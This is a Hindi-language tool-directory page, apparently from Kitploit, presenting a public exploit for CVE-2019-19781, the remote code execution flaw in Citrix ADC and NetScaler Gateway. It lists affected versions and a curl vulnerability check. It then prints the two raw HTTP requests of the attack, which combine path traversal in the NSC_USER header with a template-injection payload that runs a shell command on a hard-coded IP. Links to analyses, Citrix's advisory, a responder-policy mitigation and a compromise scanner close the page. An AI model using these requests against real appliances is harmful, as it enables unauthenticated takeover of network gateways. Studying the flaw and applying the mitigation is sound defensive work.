Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-19781 — CVE-2019-19781 - Remote Code Execution on Citrix ADC Netscaler exploit | Kitploit
उपकरण/GitHubGitHub/mpgn/cve-2019-19781
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingIncident ResponseRemote Access Tool
GitHubmpgn/cve-2019-19781

CVE-2019-19781

CVE-2019-19781 - Remote Code Execution on Citrix ADC Netscaler exploit

रिपॉजिटरी देखें
157345 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-19781

Citrix Application Delivery Controller और Citrix Gateway में रिमोट कोड एक्ज़ीक्यूशन (RCE)

Citrix Application Delivery Controller (ADC) (पूर्व में NetScaler ADC) और Citrix Gateway (पूर्व में NetScaler Gateway) में एक कमज़ोरी पाई गई है, जिसका फायदा उठाकर कोई अप्रमाणित हमलावर मनमाना कोड निष्पादित कर सकता है।

संपादन: CVE-2019-19781 के लिए Fireeye से संक्रमण संकेतक स्कैनर -> https://github.com/fireeye/ioc-scanner-CVE-2019-19781/

प्रभावित उत्पाद:

  • Citrix ADC और Citrix Gateway संस्करण 13.0 के सभी समर्थित बिल्ड
  • Citrix ADC और NetScaler Gateway संस्करण 12.1 के सभी समर्थित बिल्ड
  • Citrix ADC और NetScaler Gateway संस्करण 12.0 के सभी समर्थित बिल्ड
  • Citrix ADC और NetScaler Gateway संस्करण 11.1 के सभी समर्थित बिल्ड
  • Citrix NetScaler ADC और NetScaler Gateway संस्करण 10.5 के सभी समर्थित बिल्ड

image

जाँचें कि क्या सिस्टम असुरक्षित है

root@kitploit:~
TARGET=your_ip
curl -vk –path-as-is https://$TARGET/vpn/../vpns/ 2>&1 | grep “You don’t have permission to access /vpns/” >/dev/null && echo “VULNERABLE: $TARGET” || echo “MITIGATED: $TARGET”

असुरक्षित Perl स्क्रिप्ट

root@kitploit:~
POST /vpn/../vpns/portal/scripts/newbm.pl
POST /vpn/../vpns/portal/scripts/rmbm.pl
GET /vpn/../vpns/portal/scripts/picktheme.pl

शोषण

इस कमज़ोरी का दोहन करने के लिए बिना किसी प्रमाणीकरण के केवल दो अनुरोधों की आवश्यकता है!

पहला अनुरोध:

root@kitploit:~
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close
Content-Length: 103

url=http://exemple.com&title=[%t=template.new({'BLOCK'='print `uname -a`'})%][% t %]&desc=test&UI_inuse=RfWeb

दूसरा अनुरोध:

root@kitploit:~
GET /vpns/portal/bonclay4.xml HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close

image

विस्तृत विश्लेषण (अंग्रेज़ी में):

  • Craig Young => https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/
  • @MDSecLabs => https://www.mdsec.co.uk/2020/01/deep-dive-in-to-citrix-adc-remote-code-execution-cve-2019-19781/
  • @mpgn_x64 => https://twitter.com/mpgn_x64/status/1214544993261674497

सुरक्षा सलाह:

  • https://support.citrix.com/article/CTX267027

पैच (वास्तविक पैच नहीं)

  • https://support.citrix.com/article/CTX267679
root@kitploit:~
enable ns feature responder
add responder action respondwith403 respondwith "\"HTTP/1.1 403 Forbidden\r\n\r\n\""
add responder policy ctx267027 "HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/vpns/\") && (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/../\"))" respondwith403
bind responder global ctx267027 1 END -type REQ_OVERRIDE
save config 
टूल डाउनलोड करें